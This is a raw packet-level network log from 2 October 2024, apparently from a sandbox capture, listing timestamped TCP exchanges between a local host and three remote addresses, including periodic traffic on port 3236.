Oct 2, 2024 05:28:18.740179062 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.742805958 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.742824078 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.742878914 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.742887020 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.742922068 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.742947102 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.794186115 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.794219017 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.794269085 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.794280052 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.794322014 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.794632912 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.794652939 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.794708967 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.794718981 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.794764996 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.794867039 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.794886112 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.794933081 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.794939995 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.794975042 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.795327902 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.795346975 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.795388937 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.795396090 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.795414925 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.795439959 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.795751095 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.795770884 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.795819998 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.795826912 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.795883894 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.796195984 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.796215057 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.796281099 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.796287060 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.796299934 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.796334028 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.826913118 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.826937914 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.826986074 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.826994896 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.827035904 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.829878092 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.829898119 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.829956055 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.829963923 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.830007076 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.881014109 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.881043911 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.881094933 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.881107092 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.881159067 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.881263018 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.881285906 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.881340027 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.881345987 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.881414890 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.881730080 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.881752968 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.881787062 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.881794930 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.881822109 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.881838083 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.882150888 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.882169008 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.882208109 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.882215977 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.882245064 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.882257938 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.882514000 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.882539988 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.882601023 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.882607937 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.882639885 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.882961988 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.882981062 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.883038044 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.883044958 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.883085012 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.913886070 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.913913965 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.913971901 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.913979053 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.914012909 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.914036989 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.916841984 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.916862965 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.916922092 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.916930914 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.916971922 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.967840910 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.967863083 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.968024969 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.968035936 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.968086958 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.968301058 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.968322039 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.968375921 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.968384027 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.968425035 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.968630075 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.968648911 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.968699932 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.968708038 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.968744993 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.969077110 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.969095945 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.969142914 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.969149113 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.969187021 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.969579935 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.969602108 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.969640017 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.969647884 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.969666004 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.969683886 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.969963074 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.969980955 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.970030069 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.970036030 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.970072985 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:19.000845909 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:19.000866890 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:19.000932932 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:19.000957966 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:19.001007080 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:19.003396034 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:19.003454924 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:19.003462076 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:19.003485918 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:19.003501892 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:19.003530025 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:19.005898952 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:19.105524063 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:19.105565071 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:19.105642080 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:19.106161118 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:19.106178045 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:19.568315983 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:19.568473101 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:19.611934900 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:19.611957073 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:19.612334013 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:19.614150047 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:19.659399986 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.027743101 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.027795076 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.027829885 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.027920961 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:20.027940989 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.027986050 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:20.092077971 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.092144012 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.092187881 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.092276096 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:20.092295885 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.092308998 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.092345953 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:20.092485905 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.092533112 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:20.092546940 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.114579916 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.114614964 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.114646912 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.114677906 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.114768028 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.114797115 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:20.114814043 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.114835024 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:20.114881992 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.114912987 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.114928007 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:20.114936113 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.114980936 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:20.178958893 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.179019928 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.179053068 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.179080963 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.179111004 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:20.179136038 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.179148912 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:20.179802895 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.179836035 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.179856062 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:20.179862976 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.179910898 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:20.179918051 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.180639029 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.180674076 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.180689096 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:20.180696011 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.180728912 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.180747986 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:20.180754900 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.180793047 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:20.181360960 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.201284885 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.201319933 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.201353073 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.201390028 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.201397896 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:20.201406956 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.201452017 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:20.201663971 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.201800108 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.201833963 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.201843023 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:20.201848984 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.201869965 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:20.201901913 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:20.201906919 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.201932907 CEST	443	49713	188.114.96.3	192.168.2.6
Oct 2, 2024 05:28:20.201951027 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:20.201986074 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:20.202353954 CEST	49713	443	192.168.2.6	188.114.96.3
Oct 2, 2024 05:28:22.672604084 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:28:22.677639008 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:28:22.677711964 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:28:22.708477974 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:28:22.713300943 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:28:23.140381098 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:28:23.145569086 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:28:23.150330067 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:28:23.248271942 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:28:23.303297997 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:28:24.311203957 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:28:24.316015959 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:28:24.316123009 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:28:24.320880890 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:28:36.740643978 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:28:36.787769079 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:28:36.827399015 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:28:36.881517887 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:28:38.460630894 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:28:38.465632915 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:28:38.465714931 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:28:38.470573902 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:28:38.582884073 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:28:38.631544113 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:28:38.669670105 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:28:38.671977043 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:28:38.676840067 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:28:38.676934004 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:28:38.681721926 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:28:52.616782904 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:28:52.621567011 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:28:52.621615887 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:28:52.628936052 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:28:52.740642071 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:28:52.787816048 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:28:52.868467093 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:28:52.870376110 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:28:52.875201941 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:28:52.875261068 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:28:52.880151033 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:06.747596979 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:06.772849083 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:29:06.779973984 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:06.780045033 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:29:06.787256956 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:06.866987944 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:06.912915945 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:29:06.994605064 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:06.997014046 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:29:07.002202034 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:07.002266884 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:29:07.007117033 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:20.929148912 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:29:20.933983088 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:20.934077978 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:29:20.938821077 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:21.050951004 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:21.100477934 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:29:21.180480957 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:21.182538986 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:29:21.187455893 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:21.187529087 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:29:21.192349911 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:35.085516930 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:29:35.090460062 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:35.090585947 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:29:35.095446110 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:35.206712008 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:35.256694078 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:29:35.336519003 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:35.338690996 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:29:35.343548059 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:35.343620062 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:29:35.348449945 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:36.747492075 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:36.803636074 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:29:36.876523972 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:36.928589106 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:29:49.241633892 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:29:49.246551991 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:49.246736050 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:29:49.251543045 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:49.363914967 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:49.413078070 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:29:49.450588942 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:49.453109980 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:29:49.457988977 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:29:49.458060026 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:29:49.462843895 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:30:03.398241043 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:30:03.403408051 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:30:03.403601885 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:30:03.408366919 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:30:03.520905972 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:30:03.569497108 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:30:03.648652077 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:30:03.651192904 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:30:03.656017065 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:30:03.656071901 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:30:03.660845995 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:30:06.742718935 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:30:06.788175106 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:30:06.872567892 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:30:06.928767920 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:30:17.554383039 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:30:17.559335947 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:30:17.559412003 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:30:17.564136028 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:30:17.677273989 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:30:17.725589991 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:30:17.764211893 CEST	3236	49714	148.113.165.11	192.168.2.6
Oct 2, 2024 05:30:17.766418934 CEST	49714	3236	192.168.2.6	148.113.165.11
Oct 2, 2024 05:30:17.771471977 CEST	3236	49714	148.113.165.11	192.168.2.6
